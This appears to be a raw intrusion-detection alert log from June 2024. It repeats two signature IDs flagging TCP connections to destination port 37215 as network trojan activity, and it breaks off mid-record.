              Timestamp:06/13/24-21:33:07.057873
              SID:2835222
              Source Port:39018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670765
              SID:2829579
              Source Port:41832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194914
              SID:2835222
              Source Port:50836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274692
              SID:2829579
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092985
              SID:2835222
              Source Port:57746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569041
              SID:2835222
              Source Port:47600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.299990
              SID:2829579
              Source Port:45860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153391
              SID:2829579
              Source Port:36436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707244
              SID:2835222
              Source Port:43582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214048
              SID:2835222
              Source Port:46470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452640
              SID:2829579
              Source Port:46746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213554
              SID:2829579
              Source Port:34598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.451562
              SID:2829579
              Source Port:43302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550291
              SID:2835222
              Source Port:49194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174243
              SID:2835222
              Source Port:50796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309028
              SID:2829579
              Source Port:40512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.172810
              SID:2829579
              Source Port:46402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631928
              SID:2829579
              Source Port:34914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912670
              SID:2835222
              Source Port:48030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.043366
              SID:2835222
              Source Port:45306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677710
              SID:2829579
              Source Port:55356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214066
              SID:2829579
              Source Port:57570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265273
              SID:2829579
              Source Port:40416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.378169
              SID:2835222
              Source Port:38862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566280
              SID:2835222
              Source Port:43106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173449
              SID:2835222
              Source Port:59188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355710
              SID:2829579
              Source Port:38132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135703
              SID:2835222
              Source Port:40684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404449
              SID:2835222
              Source Port:49602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403988
              SID:2829579
              Source Port:55522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090953
              SID:2829579
              Source Port:39284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254756
              SID:2829579
              Source Port:49916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.211714
              SID:2835222
              Source Port:36546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245293
              SID:2829579
              Source Port:37230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229409
              SID:2835222
              Source Port:59364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.731701
              SID:2829579
              Source Port:48596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273541
              SID:2829579
              Source Port:45824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128147
              SID:2835222
              Source Port:54022
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403418
              SID:2835222
              Source Port:39486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.674587
              SID:2829579
              Source Port:54780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.931714
              SID:2829579
              Source Port:33582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610052
              SID:2829579
              Source Port:53976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.569742
              SID:2829579
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.837089
              SID:2829579
              Source Port:33748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695323
              SID:2835222
              Source Port:41854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265073
              SID:2835222
              Source Port:36194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242656
              SID:2829579
              Source Port:58090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.725351
              SID:2829579
              Source Port:59262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.791678
              SID:2835222
              Source Port:37540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995113
              SID:2835222
              Source Port:39916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227428
              SID:2835222
              Source Port:52396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131054
              SID:2835222
              Source Port:47720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609282
              SID:2829579
              Source Port:56736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.570363
              SID:2829579
              Source Port:34546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886149
              SID:2829579
              Source Port:58686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525798
              SID:2829579
              Source Port:48374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407964
              SID:2835222
              Source Port:43828
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.838901
              SID:2835222
              Source Port:48078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.802617
              SID:2829579
              Source Port:34894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617918
              SID:2829579
              Source Port:51234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872240
              SID:2835222
              Source Port:41302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953985
              SID:2829579
              Source Port:58204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610428
              SID:2829579
              Source Port:58100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655006
              SID:2829579
              Source Port:46768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507978
              SID:2829579
              Source Port:34552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669572
              SID:2835222
              Source Port:56050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091469
              SID:2835222
              Source Port:58336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170031
              SID:2835222
              Source Port:42110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150455
              SID:2829579
              Source Port:48906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887691
              SID:2835222
              Source Port:52264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.077266
              SID:2835222
              Source Port:52840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229662
              SID:2835222
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407164
              SID:2835222
              Source Port:37428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306147
              SID:2835222
              Source Port:46802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241561
              SID:2835222
              Source Port:35450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970190
              SID:2829579
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708758
              SID:2835222
              Source Port:42230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010973
              SID:2829579
              Source Port:34462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195203
              SID:2829579
              Source Port:41422
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.377084
              SID:2835222
              Source Port:34678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.167893
              SID:2835222
              Source Port:38162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303832
              SID:2835222
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213356
              SID:2829579
              Source Port:58522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.615718
              SID:2829579
              Source Port:54904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358659
              SID:2829579
              Source Port:58592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027925
              SID:2835222
              Source Port:60848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488219
              SID:2835222
              Source Port:55230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991035
              SID:2835222
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131375
              SID:2829579
              Source Port:56446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177850
              SID:2829579
              Source Port:58560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028723
              SID:2835222
              Source Port:38354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523873
              SID:2829579
              Source Port:40854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994292
              SID:2835222
              Source Port:41378
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306300
              SID:2829579
              Source Port:32964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.358871
              SID:2835222
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439129
              SID:2835222
              Source Port:56216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309627
              SID:2829579
              Source Port:53778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480064
              SID:2835222
              Source Port:41408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094926
              SID:2835222
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402804
              SID:2835222
              Source Port:37718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457558
              SID:2835222
              Source Port:53048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458744
              SID:2835222
              Source Port:53788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416610
              SID:2829579
              Source Port:53168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300304
              SID:2829579
              Source Port:37768
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174348
              SID:2829579
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545570
              SID:2829579
              Source Port:42024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.376763
              SID:2835222
              Source Port:39084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.914588
              SID:2835222
              Source Port:39912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.550385
              SID:2835222
              Source Port:49842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400626
              SID:2835222
              Source Port:38760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.179058
              SID:2835222
              Source Port:55392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.476752
              SID:2835222
              Source Port:57230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.950212
              SID:2829579
              Source Port:40836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.523972
              SID:2829579
              Source Port:36930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.872372
              SID:2829579
              Source Port:39968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730124
              SID:2829579
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265320
              SID:2829579
              Source Port:42988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787582
              SID:2829579
              Source Port:51946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012739
              SID:2835222
              Source Port:42882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420114
              SID:2829579
              Source Port:59294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.165118
              SID:2829579
              Source Port:56756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137685
              SID:2835222
              Source Port:42464
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.124201
              SID:2829579
              Source Port:37958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823475
              SID:2835222
              Source Port:36046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614753
              SID:2835222
              Source Port:51514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243586
              SID:2835222
              Source Port:44580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.673999
              SID:2829579
              Source Port:58344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659111
              SID:2835222
              Source Port:33844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823143
              SID:2835222
              Source Port:41816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306204
              SID:2835222
              Source Port:55038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.042505
              SID:2835222
              Source Port:40410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678763
              SID:2835222
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633429
              SID:2829579
              Source Port:51396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128269
              SID:2835222
              Source Port:34240
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.505652
              SID:2835222
              Source Port:38622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245656
              SID:2835222
              Source Port:50150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276662
              SID:2835222
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.784506
              SID:2835222
              Source Port:36898
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630939
              SID:2829579
              Source Port:38780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198226
              SID:2835222
              Source Port:56362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546659
              SID:2835222
              Source Port:56722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173592
              SID:2835222
              Source Port:58056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256617
              SID:2835222
              Source Port:58514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217060
              SID:2829579
              Source Port:33686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.457845
              SID:2829579
              Source Port:36458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633314
              SID:2829579
              Source Port:33282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276292
              SID:2835222
              Source Port:43284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603585
              SID:2829579
              Source Port:45182
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173513
              SID:2835222
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026943
              SID:2835222
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418132
              SID:2835222
              Source Port:37204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231502
              SID:2829579
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403339
              SID:2829579
              Source Port:57848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671463
              SID:2829579
              Source Port:43054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248294
              SID:2829579
              Source Port:56504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402301
              SID:2829579
              Source Port:37638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318675
              SID:2829579
              Source Port:36532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216225
              SID:2829579
              Source Port:35212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912299
              SID:2829579
              Source Port:36376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221544
              SID:2829579
              Source Port:45248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.801657
              SID:2835222
              Source Port:40902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156245
              SID:2835222
              Source Port:50144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276628
              SID:2835222
              Source Port:58088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.547224
              SID:2835222
              Source Port:50230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572321
              SID:2829579
              Source Port:38588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991693
              SID:2835222
              Source Port:56572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131741
              SID:2829579
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408187
              SID:2829579
              Source Port:36244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219077
              SID:2829579
              Source Port:33290
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402399
              SID:2835222
              Source Port:56306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748582
              SID:2835222
              Source Port:33708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.669813
              SID:2835222
              Source Port:46042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344901
              SID:2829579
              Source Port:37946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310515
              SID:2829579
              Source Port:40792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.155026
              SID:2835222
              Source Port:46838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027495
              SID:2835222
              Source Port:42720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220725
              SID:2835222
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.297440
              SID:2829579
              Source Port:36062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.129604
              SID:2829579
              Source Port:43880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.197735
              SID:2829579
              Source Port:54426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752244
              SID:2829579
              Source Port:36504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551659
              SID:2835222
              Source Port:35098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988653
              SID:2835222
              Source Port:36448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220283
              SID:2835222
              Source Port:54064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506665
              SID:2829579
              Source Port:58536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042050
              SID:2829579
              Source Port:36262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485533
              SID:2835222
              Source Port:39448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265554
              SID:2835222
              Source Port:59538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159097
              SID:2829579
              Source Port:34858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348641
              SID:2829579
              Source Port:51746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755597
              SID:2829579
              Source Port:48458
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.787976
              SID:2835222
              Source Port:51218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416514
              SID:2829579
              Source Port:41680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.090897
              SID:2829579
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400798
              SID:2835222
              Source Port:33268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989586
              SID:2829579
              Source Port:58142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176784
              SID:2829579
              Source Port:38816
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.310251
